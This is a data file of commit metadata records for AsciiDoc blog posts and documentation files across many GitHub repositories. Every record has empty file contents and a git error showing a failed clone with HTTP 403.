{"commit":"6a82a998e5bec9152cb17ae9cc75ecfc182a97b4","subject":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","message":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a170da30ef1769fd14c9b23fc4cecc38972554a1","subject":"Explain how to configure the SMS plugin","message":"Explain how to configure the SMS plugin\n","repos":"jotak\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"2698eef8b846724f2d72d0bfb6aaeb2bce7ca544","subject":"y2b create post The Worst Text You Could Ever Receive...","message":"y2b create post The Worst Text You Could Ever Receive...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-16-The%20Worst%20Text%20You%20Could%20Ever%20Receive....adoc","new_file":"_posts\/2018-02-16-The%20Worst%20Text%20You%20Could%20Ever%20Receive....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d80c78b7dc62e9fce9c07aa4f060ddb2d9b6c379","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"6950eeeb698903f1fc610f3a06afc2bed90445d5","subject":"y2b create post Beats Solo3 Wireless - iPhone 7 Headphones","message":"y2b create post Beats Solo3 Wireless - iPhone 7 Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-25-Beats-Solo3-Wireless--iPhone-7-Headphones.adoc","new_file":"_posts\/2016-09-25-Beats-Solo3-Wireless--iPhone-7-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"004d34d8520d9b4f6fbf50892ed377ad487fc1fa","subject":"Update 2016-09-10-In-Appreciation-of-Dusk.adoc","message":"Update 2016-09-10-In-Appreciation-of-Dusk.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-09-10-In-Appreciation-of-Dusk.adoc","new_file":"_posts\/2016-09-10-In-Appreciation-of-Dusk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"488c2fb700b33ad683472a883aade666b1f3cde1","subject":"ISIS-2285: updates generated docs","message":"ISIS-2285: updates generated docs\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"core\/config\/src\/main\/adoc\/modules\/config\/examples\/generated\/isis.testing.adoc","new_file":"core\/config\/src\/main\/adoc\/modules\/config\/examples\/generated\/isis.testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"dde7a760372cfcd9e69e77ab0e87b02c02bd0fe5","subject":"Update 2015-08-24-Sensit-mon-petit-objet-connecte.adoc","message":"Update 2015-08-24-Sensit-mon-petit-objet-connecte.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-08-24-Sensit-mon-petit-objet-connecte.adoc","new_file":"_posts\/2015-08-24-Sensit-mon-petit-objet-connecte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"76c0abd56a4c6782f9d595d7bbe4bf95e7982753","subject":"Update 2016-04-11-Doing-versus-doing-with-feeling.adoc","message":"Update 2016-04-11-Doing-versus-doing-with-feeling.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-11-Doing-versus-doing-with-feeling.adoc","new_file":"_posts\/2016-04-11-Doing-versus-doing-with-feeling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9af421dbf443bc3831d25aa1ce9bbd58116762e5","subject":"Update 2015-11-03-399-euros-Tonto-el-ultimo-Y-porque-decidi-ser-el-ultimo.adoc","message":"Update 2015-11-03-399-euros-Tonto-el-ultimo-Y-porque-decidi-ser-el-ultimo.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-11-03-399-euros-Tonto-el-ultimo-Y-porque-decidi-ser-el-ultimo.adoc","new_file":"_posts\/2015-11-03-399-euros-Tonto-el-ultimo-Y-porque-decidi-ser-el-ultimo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e81ffe0bab022de6697f69b41fa1253e739d93e0","subject":"Update 2016-7-8.adoc","message":"Update 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-8.adoc","new_file":"_posts\/2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"26fd4c6bad9b8a5f59f1f45bd4eb8fc101997aa4","subject":"Update 2017-01-18-Git-Hub-Pages-Portfolio-Sites-for-Non-coding-Journalists.adoc","message":"Update 2017-01-18-Git-Hub-Pages-Portfolio-Sites-for-Non-coding-Journalists.adoc","repos":"joshuarrrr\/hubpress.io,joshuarrrr\/hubpress.io,joshuarrrr\/hubpress.io,joshuarrrr\/hubpress.io","old_file":"_posts\/2017-01-18-Git-Hub-Pages-Portfolio-Sites-for-Non-coding-Journalists.adoc","new_file":"_posts\/2017-01-18-Git-Hub-Pages-Portfolio-Sites-for-Non-coding-Journalists.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuarrrr\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b6dacdbe5318b01dfdfcbdb0acf56fa1cb07ebcf","subject":"y2b create post Amazon Kindle Fire Package Winner Announcement","message":"y2b create post Amazon Kindle Fire Package Winner Announcement","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-02-28-Amazon-Kindle-Fire-Package-Winner-Announcement.adoc","new_file":"_posts\/2012-02-28-Amazon-Kindle-Fire-Package-Winner-Announcement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"81af65ad557475e89a1ef1e875bd700abc1c80c8","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"4fcd329f742b56ffab7c37f0859136173c68c530","subject":"Update 2017-05-14-Thats-Relevant.adoc","message":"Update 2017-05-14-Thats-Relevant.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-05-14-Thats-Relevant.adoc","new_file":"_posts\/2017-05-14-Thats-Relevant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"285cab51b7013a21473aca3f5a70048b604e6e6e","subject":"y2b create post GTA V MIDNIGHT LAUNCH!","message":"y2b create post GTA V MIDNIGHT LAUNCH!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-17-GTA-V-MIDNIGHT-LAUNCH.adoc","new_file":"_posts\/2013-09-17-GTA-V-MIDNIGHT-LAUNCH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"36235235663c22a35d8f28aa039ca34dfbe39299","subject":"Update 2014-1-1-A-Man-Without-a-Country.adoc","message":"Update 2014-1-1-A-Man-Without-a-Country.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-1-1-A-Man-Without-a-Country.adoc","new_file":"_posts\/2014-1-1-A-Man-Without-a-Country.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8d7cdee9c3cfefc09642c37610959993e1508049","subject":"Update 2015-09-16-JavaZone-2015-wrap-up.adoc","message":"Update 2015-09-16-JavaZone-2015-wrap-up.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-09-16-JavaZone-2015-wrap-up.adoc","new_file":"_posts\/2015-09-16-JavaZone-2015-wrap-up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"6270bcddf1db32e61a3429a8f768ed6bb2661940","subject":"Update 2018-01-15-Episode-123-Saucy-Sounds-from-Stepansky.adoc","message":"Update 2018-01-15-Episode-123-Saucy-Sounds-from-Stepansky.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2018-01-15-Episode-123-Saucy-Sounds-from-Stepansky.adoc","new_file":"_posts\/2018-01-15-Episode-123-Saucy-Sounds-from-Stepansky.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"af0ccd3dd10e921942c9d1ad29898c23c0820636","subject":"Update 2016-10-31-The-state-of-Macbooks.adoc","message":"Update 2016-10-31-The-state-of-Macbooks.adoc","repos":"laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io","old_file":"_posts\/2016-10-31-The-state-of-Macbooks.adoc","new_file":"_posts\/2016-10-31-The-state-of-Macbooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laposheureux\/laposheureux.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d10f69eafa6ca18f4a853447100e2fc87b4df667","subject":"Update 2018-08-21-Convert-snake-case-to-camel-Case-in-Vim.adoc","message":"Update 2018-08-21-Convert-snake-case-to-camel-Case-in-Vim.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2018-08-21-Convert-snake-case-to-camel-Case-in-Vim.adoc","new_file":"_posts\/2018-08-21-Convert-snake-case-to-camel-Case-in-Vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f329c07f5f5a4ab627c4a0a36cf02549b67b6795","subject":"\u589e\u52a0\u65b0\u6587\u4ef6","message":"\u589e\u52a0\u65b0\u6587\u4ef6\n","repos":"diguage\/jdk-source-analysis,diguage\/jdk-source-analysis,diguage\/jdk-source-analysis","old_file":"ConcurrentHashMap.adoc","new_file":"ConcurrentHashMap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diguage\/jdk-source-analysis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"cdd135d17295e8f0df5ca6ca103e55cccb56c273","subject":"Add initial contributing guidelines","message":"Add initial contributing guidelines\n","repos":"maxandersen\/gdoc2adoc","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/maxandersen\/gdoc2adoc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"8f85de59167cb2b4d1276fd37f67a8504cb2fd6f","subject":"added","message":"added\n","repos":"m-m-m\/transaction","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/transaction.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"fe997283d1b20c685f743e528328bbe99519549e","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-sleuth.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"47533f6c06e591ebf7e7c87b75db8371bd0ddc0c","subject":"common snippet : tip scaffolding","message":"common snippet : tip scaffolding\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-tipScaffolding.adoc","new_file":"src\/main\/docs\/common-tipScaffolding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"d2c57fb2043eff96df5450de69cabb727f7c5d6d","subject":"y2b create post Apple Is Deliberately Slowing Down Your iPhone","message":"y2b create post Apple Is Deliberately Slowing Down Your iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-23-Apple%20Is%20Deliberately%20Slowing%20Down%20Your%20iPhone.adoc","new_file":"_posts\/2017-12-23-Apple%20Is%20Deliberately%20Slowing%20Down%20Your%20iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"bdc8e61b8187f4e53e80547e0c6628e22127136a","subject":"Announcement for 0.6.2","message":"Announcement for 0.6.2\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-11-15-debezium-0-6-2-released.adoc","new_file":"blog\/2017-11-15-debezium-0-6-2-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"89539897229b581a5a575a0f53a4b47c96976e2f","subject":"DeveloperGuide.adoc: Add step for updating version number in MainApp (#543)","message":"DeveloperGuide.adoc: Add step for updating version number in MainApp (#543)\n\nWhen doing a new release, MainApp#VERSION needs to be updated to match\r\nthe release version number.\r\n\r\nThis step is not reflected in DeveloperGuide.adoc's release devops\r\nprocedure.\r\n\r\nLet's add the step for updating the version number in MainApp.","repos":"damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,se-edu\/addressbook-level3,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4","old_file":"docs\/DeveloperGuide.adoc","new_file":"docs\/DeveloperGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level3.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9b8e1759c6c7ddabb3bb515cb24c0dcfc42a941f","subject":"Added first draft man page\/API doc in asciidoc format","message":"Added first draft man page\/API doc in asciidoc format\n","repos":"Omnikron13\/phlite","old_file":"doc\/phlite.adoc","new_file":"doc\/phlite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Omnikron13\/phlite.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b8ac56950d89767442663a87d083b57a52f11f67","subject":"D3 layout int\u00e9ressant","message":"D3 layout int\u00e9ressant\n","repos":"autosvg\/autosvg,autosvg\/autosvg,autosvg\/autosvg","old_file":"docs\/notes.adoc","new_file":"docs\/notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/autosvg\/autosvg.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"}
{"commit":"7a7ad127ec47feb0acf661e3e34699b2a72ad10a","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/the_age_of_constructive_conversation.adoc","new_file":"content\/writings\/the_age_of_constructive_conversation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"546d1ed58247bf6be8611ceffffaa21cde74712e","subject":"add big oh notation","message":"add big oh notation\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"bigONotation.adoc","new_file":"bigONotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"}
{"commit":"0a5daa830041b4b8dc7ebe855abb65491546a24b","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c578bdd05104c61bd4a21f4096c65e8d8339ac9a","subject":"Create 2015-04-29-JVM-Study.adoc","message":"Create 2015-04-29-JVM-Study.adoc","repos":"bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io","old_file":"_posts\/2015-04-29-JVM-Study.adoc","new_file":"_posts\/2015-04-29-JVM-Study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bahamoth\/bahamoth.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b8147b75cb7101c6f117772f31f3e75b67fa5001","subject":"Update 2016-03-10-Hub-Press.adoc","message":"Update 2016-03-10-Hub-Press.adoc","repos":"innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io","old_file":"_posts\/2016-03-10-Hub-Press.adoc","new_file":"_posts\/2016-03-10-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-yagasaki\/innovation-yagasaki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ce65ddf120239a1606f8dfb9664bd2268ca25c7c","subject":"Update 2017-08-24-Test-Post.adoc","message":"Update 2017-08-24-Test-Post.adoc","repos":"ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog","old_file":"_posts\/2017-08-24-Test-Post.adoc","new_file":"_posts\/2017-08-24-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ambarishpande\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"fa967ce15afa0dadc1b35eab2e1f94a2d3296f45","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"829b081633e3c42e14144d34129406a61f0409d1","subject":"feat(doc) : create CONTRIBUTING file","message":"feat(doc) : create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"8708e06c8ddeeb658852d7179b5e39148ba8c9e3","subject":"Cyber Zombie One Shot","message":"Cyber Zombie One Shot\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a3e1ff332f3a5bdb700e2fa1abf2c2e11fe9b19b","subject":"First draft of request api documentation","message":"First draft of request api documentation\n","repos":"tcmitchell\/geni-ch,tcmitchell\/geni-ch","old_file":"docs\/RequestAPI.adoc","new_file":"docs\/RequestAPI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcmitchell\/geni-ch.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"072453de0574c428355e40a88172bc8a9d3f4f2f","subject":"add CNCF.adoc","message":"add CNCF.adoc\n","repos":"jls502\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,zhengxiaochuan-3\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,zhengxiaochuan-3\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,jls502\/containerfs","old_file":"CNCF.adoc","new_file":"CNCF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jls502\/containerfs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"51f4be4b150b824f99ab35f06caba2fe01aab678","subject":"Update 2015-11-01-Enlaces-Utiles-Developer.adoc","message":"Update 2015-11-01-Enlaces-Utiles-Developer.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Enlaces-Utiles-Developer.adoc","new_file":"_posts\/2015-11-01-Enlaces-Utiles-Developer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b8f80314354ea50000f1b7889e669a04777f41c2","subject":"Update 2016-07-01-Reading-Between-The-Bits.adoc","message":"Update 2016-07-01-Reading-Between-The-Bits.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
